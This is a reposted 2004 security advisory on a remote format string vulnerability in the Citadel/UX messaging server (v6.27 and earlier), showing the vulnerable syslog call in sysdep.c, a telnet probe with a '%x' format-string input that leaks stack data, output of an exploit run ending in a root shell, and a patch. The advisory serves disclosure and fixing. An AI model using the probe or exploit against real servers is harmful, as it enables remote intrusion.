Copy Link
Add to Bookmark
Report

09 - Citadel/UX <= v6.27 and prior Format String Vulnerability

eZine's profile picture
Published in 
Advisory
 · 1 year ago

No System Group - Advisory #09 - 12/12/04

  • Program: Citadel/UX
  • Homepage: http://www.citadel.org
  • Operating System: Linux and Unix-Compatible
  • Vulnerable Versions: Citadel/UX v6.27 and prior
  • Risk: High
  • Impact: Remote Format String Vulnerability

DESCRIPTION

Citadel/UX is an advanced client/server messaging and collaboration system for BBS and groupware applications. Users can connect to Citadel/UX using any telnet, WWW, or client software. Among the features supported are public and private message bases (rooms), electronic mail, real-time chat, paging, etc. The server is multithreaded and can easily support a large number of concurrent users. In addition, SMTP, IMAP, and POP3 servers are built-in for easy connection to Internet mail. Citadel/UX is both robust and mature, having been developed over the course of the past thirteen years.

More informations at: http://www.citadel.org

DETAILS

Exist a format string bug in the lprintf() function of sysdep.c when parses erroneous arguments to the syslog() function. This may to cause a denial of service or give remote shell with privileges of Citadel/UX.

---------- sysdep.c ---------- 
108: void lprintf(enum LogLevel loglevel, const char *format, ...) {
109: va_list arg_ptr;
110: char buf[SIZ];
111:
112: va_start(arg_ptr, format);
113: vsnprintf(buf, sizeof(buf), format, arg_ptr);
114: va_end(arg_ptr);
115:
116: if (syslog_facility >= 0) {
117: if (loglevel <= verbosity) {
118: /* Hackery -IO */
119: if (CC && CC->cs_pid) {
120: memmove(buf + 6, buf, sizeof(buf) - 6);
121: snprintf(buf, 6, "[%3d]", CC->cs_pid);
122: buf[5] = ' ';
123: }
124: syslog(loglevel, buf); // <-- the format bug
125: }
126: }
---------- sysdep.c ----------

Now we proceed to see what happens.

coki@nosystem:~/audit$ telnet localhost 504 
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$

We connect us to Citadel/UX server to 504 port and send a test string.

coki@nosystem:~/audit$ tail -n 5 /var/log/messages 
Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended.
Dec 12 11:08:19 nosystem citadel[1303]: [ 1] Session started.
Dec 12 11:08:33 nosystem citadel[1303]: [ 1] Citadel: AAAA8090fe0
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Citadel: quit
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Session ended.
coki@nosystem:~/audit$

We can to see part of the stack sending a malicious format string.

EXPLOIT

I have written a code exploit that use this format bug for to obtain a remote shell in a target.

http://www.nosystem.com.ar/exploits/citadel_fsexp.c

coki@servidor:~$ make citadel_fsexp 
coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0

Citadel/UX v6.27 remote format string exploit
by CoKi <coki@nosystem.com.ar>

[*] host : localhost
[*] system : Slackware Linux 10.0
[*] syslog GOT address : 0x0809e9e8
[*] RET address : 0xbfffd5fa

[+] verifying host... OK
[+] conecting... OK
[+] building evil buffer... OK
[+] sending evil buffer... OK

[+] waiting for shell...
[+] connecting to shell... OK

[!] you have a shell :)

Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

SOLUTIONS

The patch is included here: 

--- sysdep.c 2004-11-03 17:19:00.000000000 -0300
+++ sysdep.c 2004-12-12 13:14:12.000000000 -0300
@@ -121,7 +121,7 @@
snprintf(buf, 6, "[%3d]", CC->cs_pid);
buf[5] = ' ';
}
- syslog(loglevel, buf);
+ syslog(loglevel, "%s", buf);
}
}
else if (loglevel <= verbosity) {


REFERENCES

http://www.nosystem.com.ar/advisories/advisory-09.txt

CREDITS

Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT